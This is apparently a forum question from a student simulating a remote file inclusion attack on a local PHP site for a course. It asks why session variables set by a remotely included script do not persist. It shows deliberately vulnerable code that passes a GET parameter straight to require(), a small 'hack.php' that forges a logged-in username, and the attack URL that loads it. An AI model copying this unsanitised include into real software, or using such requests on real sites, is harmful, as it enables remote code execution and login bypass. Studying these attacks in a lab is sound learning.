I'm trying to simulate a remote file inclusion attack on my local web server as part of a course I am taking. I got the idea of being able to "logging" in on a website I set up without really logging via the system, rather by just setting the appropriate session variables in a remote script and then including it in the code of my website. Now I got the script to be included and run on my website (I can echo strings etc.) but I cannot seem to set session variables using the remote script. Does anybody have any idea why?
Here is the code of the website so far:
index.php:
<?php session_start(); ?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<?php require("php/imageupload.php"); ?>
<p>Logged in as: <?php echo $_SESSION['username']; ?></p>
</body>
</html>
imageupload.php:
<?php
session_start();
$file = $_GET["file"];
require($file);
?>
hack.php (remote file):
<?php
session_start();
$_SESSION['username'] = "foo";
echo "test";
?>
When I request http://localhost/index.php?file=http://127.0.0.1/hack.php
I get the following response:
test
Logged in as: